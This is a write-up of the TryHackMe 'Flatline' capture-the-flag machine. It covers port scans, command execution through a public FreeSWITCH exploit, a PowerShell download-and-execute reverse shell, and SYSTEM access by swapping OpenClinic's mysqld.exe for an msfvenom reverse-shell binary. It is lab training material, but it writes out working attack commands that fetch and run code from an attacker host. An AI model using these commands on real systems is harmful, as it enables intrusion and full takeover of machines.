Krishna

Posted onNov 6, 2022

TryHackMe Flatline Walkthrough

#beginners #security #tryhackme #ctf

TryHackMe page for this machine =>https://tryhackme.com/room/flatline

NOTE: I had to terminate and start the machine multiple times, as the exploit needed for foothold timed out multiple times. You may have to do the same.

Enum

rustscan nmap

rustscan-a 10.10.98.113---A-PnOpen 10.10.98.113:3389Open 10.10.98.113:8021PORT     STATE SERVICE          REASON  VERSION3389/tcp open  ms-wbt-server    syn-ack Microsoft Terminal Services| rdp-ntlm-info: |   Target_Name: WIN-EOM4PK0578N|   NetBIOS_Domain_Name: WIN-EOM4PK0578N|   NetBIOS_Computer_Name: WIN-EOM4PK0578N|   DNS_Domain_Name: WIN-EOM4PK0578N|   DNS_Computer_Name: WIN-EOM4PK0578N|   Product_Version: 10.0.17763|_  System_Time: 2022-11-06T09:40:13+00:00| ssl-cert: Subject:commonName=WIN-EOM4PK0578N| Issuer:commonName=WIN-EOM4PK0578N| Public Keytype: rsa| Public Key bits: 2048| Signature Algorithm: sha256WithRSAEncryption| Not valid before: 2022-11-05T09:12:21| Not valid after:  2023-05-07T09:12:21| MD5:   3090 28ea a18f 37ce f134 275b 8a11 85b7| SHA-1: 0594 e942 a7b3 ca04 7e4e 625c 6c0b 6903 f089 dde0|-----BEGIN CERTIFICATE-----| MIIC4jCCAcqgAwIBAgIQd/ojPAXxV75Ihn2h8kAwfTANBgkqhkiG9w0BAQsFADAa| MRgwFgYDVQQDEw9XSU4tRU9NNFBLMDU3OE4wHhcNMjIxMTA1MDkxMjIxWhcNMjMw| NTA3MDkxMjIxWjAaMRgwFgYDVQQDEw9XSU4tRU9NNFBLMDU3OE4wggEiMA0GCSqG| SIb3DQEBAQUAA4IBDwAwggEKAoIBAQClNnOLEC5U40F8dFZZtmmSj8zVa4Fqd0fU| 3O+Pf/sDLF/23s4R6LkjvmjZaGNWMAVzlKwOMYJ3umlmLTRJJF0DEnaM79phGLba| ePPbdRiUjUQFdBK9tyPpYCLB2m+K1z0YJLoXt8br7WSVp7Ho8Sz2E6sBZRM5H6QN| ptO8j/syFSdLYWusTAp/gEQpVUoiElFcmDfa7rP2gQELHb03EvL9Gz9lPRrrVA3r| XzEUNuqkG4J70LenFv7AH1j70FL48UStBESKYLaXaruRN8TkVjRWhmrYhC7tMVRB| h8oVb8bcCvwqsw7VYEy197AdyePV0fkvjfbyrp6tstPMVm4hFM2FAgMBAAGjJDAi| MBMGA1UdJQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsF| AAOCAQEAfv/F86NeGYpqgaQz5Q+R5FrYkqnZoZBxrlbpG8rB9+hixOjRs6s6skjy| x0IYovOcSXI3Sy4dh3GRjWn+hv5szbYzb4hKQojzw7CNScJSbTyGh7sJuGv1+hUe| F6izAORicQkApcLweXv5MyVj1qUrmwWo4DpbG34nIf6W6hpNlW2VdWfCqIfjnEvy| 3LOWrn++sncxXdBmg24fDNohJJFgvp3ui7VbmYVepe1SmqIql7vKt+qMV2kZv+cg| SU1pZqYrHwwcpD3Qx6R7oqSVHjulW1eGTC6t+au8Oc6rytgamvbrCIGAwSUVcJLt| pVkvw++/yMtWLoiiT+RCa2abEwEcPw==|_-----END CERTIFICATE-----|_ssl-date: 2022-11-06T09:40:13+00:00; 0s from scanner time.8021/tcp open  freeswitch-event syn-ack FreeSWITCH mod_event_socketService Info: OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:|_clock-skew: mean: 0s, deviation: 0s, median: 0s

Note: The machine keeps blocking ping probes. So use the nmap-Pn flag when enumerating the machine!.

Port 3389 Enumeration

Let's use some nmap scripts to enumerate the port some more.

└─$sudonmap--script="rdp-*"-p 3389 flatline.thm-vv-PnPORT     STATE SERVICE       REASON3389/tcp open  ms-wbt-server syn-ack ttl 127| rdp-ntlm-info: |   Target_Name: WIN-EOM4PK0578N|   NetBIOS_Domain_Name: WIN-EOM4PK0578N|   NetBIOS_Computer_Name: WIN-EOM4PK0578N|   DNS_Domain_Name: WIN-EOM4PK0578N|   DNS_Computer_Name: WIN-EOM4PK0578N|   Product_Version: 10.0.17763|_  System_Time: 2022-11-06T09:55:55+00:00| rdp-enum-encryption: |   Security layer|     CredSSP(NLA): SUCCESS|     CredSSP with Early User Auth: SUCCESS|_    RDSTLS: SUCCESS

Port 8021 Enumeration

I wanted to see what in the world FreeSWITCH is. From Wikipediahttps://en.wikipedia.org/wiki/FreeSWITCH

**FreeSWITCH* isfree and open-source server software forreal-time communication applications, includingWebRTC,video, andvoice over Internet Protocol (VoIP). It runs onLinux,Windows,macOS, andFreeBSD. FreeSWITCH is used to buildprivate branch exchange (PBX)telecommunication systems,IVR services,videoconferencing withchat andscreen sharing, wholesaleleast-cost routing,Session Border Controller (SBC) andembedded communicationappliances.*

Let's look for some vulnerabilities.

└─$searchsploit freeswitch------------------------------------------------------------------------------------------------------------------------------------------------------------ Exploit Title                                                                                                             |  Path------------------------------------------------------------------------------------------------------------------------------------------------------------FreeSWITCH - Event Socket Command Execution(Metasploit)                                                                   | multiple/remote/47698.rbFreeSWITCH 1.10.1 - Command Execution                                                                                      | windows/remote/47799.txt------------------------------------------------------------------------------------------------------------------------------------------------------------Shellcodes: No Results

Interesting. Let's try and get RCE without Metasploit.

Foothold

RCE without Metasploit

Using the script present here =>https://www.exploit-db.com/exploits/47799

└─$python3 exploit.py flatline.thmwhoamiAuthenticatedContent-Type: api/responseContent-Length: 25win-eom4pk0578n\nekrotic

Looks like it works! Let's try and get a proper shell going on here.

└─$python3exploit.py10.10.7.242dirAuthenticatedContent-Type:api/responseContent-Length:2346VolumeindriveChasnolabel.VolumeSerialNumberis84FD-2CC9DirectoryofC:\ProgramFiles\FreeSWITCH09/11/202107:38<DIR>.09/11/202107:38<DIR>..09/11/202107:22<DIR>cert09/11/202107:22<DIR>conf06/11/202210:33<DIR>db09/11/202107:18<DIR>fonts20/08/201912:084,991,488FreeSwitch.dll20/08/201912:0826,624FreeSwitchConsole.exe20/08/201912:1962,976fs_cli.exe09/11/202107:18<DIR>grammar---SNIP---24/03/201820:2015,766,528v8.dll24/03/201820:05177,152v8_libbase.dll24/03/201820:19134,656v8_libplatform.dll03/04/201814:01126,976zlib.dll28File(s)96,800,060bytes17Dir(s)50,476,666,880bytesfree

Let's try and get the user flag.

└─$python3exploit.py10.10.7.242"dir C:\\Users\\"AuthenticatedContent-Type:api/responseContent-Length:405VolumeindriveChasnolabel.VolumeSerialNumberis84FD-2CC9DirectoryofC:\Users09/11/202107:28<DIR>.09/11/202107:28<DIR>..09/11/202107:13<DIR>Administrator09/11/202107:37<DIR>Nekrotic09/11/202107:13<DIR>Public0File(s)0bytes5Dir(s)50,457,559,040bytesfree└─$python3exploit.py10.10.7.242"dir C:\\Users\\Nekrotic\\Desktop\\"AuthenticatedContent-Type:api/responseContent-Length:374VolumeindriveChasnolabel.VolumeSerialNumberis84FD-2CC9DirectoryofC:\Users\Nekrotic\Desktop09/11/202107:39<DIR>.09/11/202107:39<DIR>..09/11/202107:3938root.txt09/11/202107:3938user.txt2File(s)76bytes2Dir(s)50,446,991,360bytesfree

Wow. We seem to have found both files. We can readuser.txt.

But we can't readroot.txt. Probably a permissions issue.

Let's get a powershell reverse shell to see what's really going on.

Powershell Reverse Shell

Save this filehttps://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1
Delete the second shell comment. As for the first one, uncomment and replace IP and PORT as per your choice.
Start a Python web server in the folder where you saved the powershell script. This is what we will use to serve the script.
Download and execute the script on remote machine using the FreeSWITCH exploit.

Running the exploit

┌──(kali㉿kali)-[~/Documents/ctf/thm_easy_flatline]└─$python3 exploit.py 10.10.7.242"powershell IEX (New-Object Net.WebClient).DownloadString('http://10.14.31.78/Invoke-PowerShellTcpOneLine.ps1')"

Run the web server to serve the Powershell reverse shell

└─$python3-m http.server 80Serving HTTP on 0.0.0.0 port 80(http://0.0.0.0:80/) ...10.10.7.242 - -[06/Nov/2022 06:20:12]"GET /Invoke-PowerShellTcpOneLine.ps1 HTTP/1.1" 200 -

Reverse Shell listener

┌──(kali㉿kali)-[~]└─$ncat-lnvp4444Ncat:Version7.93(https://nmap.org/ncat)Ncat:Listeningon:::4444Ncat:Listeningon0.0.0.0:4444Ncat:Connectionfrom10.10.7.242.Ncat:Connectionfrom10.10.7.242:49899.PSC:\ProgramFiles\FreeSWITCH>gciDirectory:C:\ProgramFiles\FreeSWITCHModeLastWriteTimeLengthName---------------------------d-----09/11/202107:22certd-----09/11/202107:22confd-----06/11/202210:33dbd-----09/11/202107:18fontsd-----09/11/202107:18grammar....SNIP....PSC:\Users\Nekrotic\Desktop>get-acl-pathuser.txtDirectory:C:\Users\Nekrotic\DesktopPathOwnerAccess---------------user.txtWIN-EOM4PK0578N\NekroticNTAUTHORITY\SYSTEMAllowFullControl...PSC:\Users\Nekrotic\Desktop>get-acl-Pathroot.txtDirectory:C:\Users\Nekrotic\DesktopPathOwnerAccess---------------root.txtNTAUTHORITY\SYSTEMNTAUTHORITY\SYSTEMAllowFullControl

Now we can see why we can't readroot.txt. We will need to escalate privileges to be able to read the file.

Privesc

While taking a look around the system, I came across this in the Administrator's desktop

PSC:\Users\Administrator\Desktop>gciDirectory:C:\Users\Administrator\DesktopModeLastWriteTimeLengthName----------------------------a----08/11/202118:24108048384FreeSWITCH-1.10.1-Release-x64.msi-a----08/11/202106:05413584335OpenClinicSetup5.194.18_32bit_full_fr_en_pt_es_nl.exe

I am guessing thisOpenClinic software is installed. Looking around the system further, we find its installation location atC:\projects\openclinic.

PSC:\projects\openclinic>gciDirectory:C:\projects\openclinicModeLastWriteTimeLengthName---------------------------d-----09/11/202107:29jdk1.8d-----09/11/202107:19mariadbd-----09/11/202107:30tomcat8d-----09/11/202107:29Uninstall-a----06/04/202123:14250configureCountry.bat-a----01/07/202118:20167configureLanguage.bat-a----09/11/202107:18334840lua5.1.dll-a----07/06/202116:5893696OpenClinicGAlogin.exe-a----08/05/202012:1727136OpenClinicStartServices.exe-a----02/05/202100:45316stopOpenClinicHttp.bat-a----09/11/202107:181389568uninstall.exe

Let's see what we can do with this.

┌──(kali㉿kali)-[~/Documents/ctf_tools]└─$searchsploit openclinic------------------------------------------------------------------------------------------------------------------------------------------------------------ Exploit Title                                                                                                             |  Path------------------------------------------------------------------------------------------------------------------------------------------------------------OpenClinic GA 5.194.18 - Local Privilege Escalation                                                                        | windows/local/50448.txt------------------------------------------------------------------------------------------------------------------------------------------------------------

Details of this exploit here =>https://www.exploit-db.com/exploits/50448

According to the instructions we need to replace themysqld.exe present in the OpenClinic installation with a malicious payload generated by us.

Let's see if we have the permissions to do that.

PSC:\projects\openclinic\mariadb\bin>get-acl-Path.Directory:C:\projects\openclinic\mariadbPathOwnerAccess---------------binBUILTIN\AdministratorsNTAUTHORITY\SYSTEMAllowFullControl...PSC:\projects\openclinic\mariadb\bin>whoami/groupsGROUPINFORMATION-----------------GroupNameTypeSIDAttributes========================================================================================================================================================EveryoneWell-knowngroupS-1-1-0Mandatorygroup,Enabledbydefault,EnabledgroupNTAUTHORITY\LocalaccountandmemberofAdministratorsgroupWell-knowngroupS-1-5-114Mandatorygroup,Enabledbydefault,EnabledgroupBUILTIN\AdministratorsAliasS-1-5-32-544Mandatorygroup,Enabledbydefault,Enabledgroup,GroupownerBUILTIN\UsersAliasS-1-5-32-545Mandatorygroup,Enabledbydefault,EnabledgroupNTAUTHORITY\BATCHWell-knowngroupS-1-5-3Mandatorygroup,Enabledbydefault,EnabledgroupCONSOLELOGONWell-knowngroupS-1-2-1Mandatorygroup,Enabledbydefault,EnabledgroupNTAUTHORITY\AuthenticatedUsersWell-knowngroupS-1-5-11Mandatorygroup,Enabledbydefault,EnabledgroupNTAUTHORITY\ThisOrganizationWell-knowngroupS-1-5-15Mandatorygroup,Enabledbydefault,EnabledgroupNTAUTHORITY\LocalaccountWell-knowngroupS-1-5-113Mandatorygroup,Enabledbydefault,EnabledgroupLOCALWell-knowngroupS-1-2-0Mandatorygroup,Enabledbydefault,EnabledgroupNTAUTHORITY\NTLMAuthenticationWell-knowngroupS-1-5-64-10Mandatorygroup,Enabledbydefault,EnabledgroupMandatoryLabel\HighMandatoryLevelLabelS-1-16-12288

Looks like we can.

Let's begin.

Generate Payload

On our machine.

└─$msfpc powershell 10.14.31.78 443 cmd reverse stageless exe[*] MSFvenom Payload Creator(MSFPC v1.4.5)[i]   IP: 10.14.31.78[i] PORT: 443[i] TYPE: windows(windows/shell_reverse_tcp)[i]  CMD: msfvenom-p windows/shell_reverse_tcp-f exe\--platform windows-a x86-e generic/noneLHOST=10.14.31.78LPORT=443\>'/home/kali/Documents/ctf/thm_easy_flatline/windows-shell-stageless-reverse-tcp-443.exe'[i] windows shell created:'/home/kali/Documents/ctf/thm_easy_flatline/windows-shell-stageless-reverse-tcp-443.exe'[i] MSF handler file:'/home/kali/Documents/ctf/thm_easy_flatline/windows-shell-stageless-reverse-tcp-443-exe.rc'[i] Run: msfconsole-q-r'/home/kali/Documents/ctf/thm_easy_flatline/windows-shell-stageless-reverse-tcp-443-exe.rc'[?] Quick web server(forfile transfer)?: python2-m SimpleHTTPServer 8080[*] Done!└─$mvwindows-shell-stageless-reverse-tcp-443.exe mysqld.exe

On the server.

We will have to restart the computer as per the exploit instructions.

PSC:\projects\openclinic\mariadb\bin>mvmysqld.exemysqld.exe.bakPSC:\projects\openclinic\mariadb\bin>IWR-Urihttp://10.14.31.78/mysqld.exe-OutFilemysqld.exePSC:\projects\openclinic>Restart-Computer

Now we wait for our reverse shell to activate.

└─$ncat-lnvp443Ncat:Version7.93(https://nmap.org/ncat)Ncat:Listeningon:::443Ncat:Listeningon0.0.0.0:443Ncat:Connectionfrom10.10.52.62.Ncat:Connectionfrom10.10.52.62:49669.MicrosoftWindows[Version10.0.17763.737](c)2018MicrosoftCorporation.Allrightsreserved.C:\Windows\system32>whoamiwhoamintauthority\system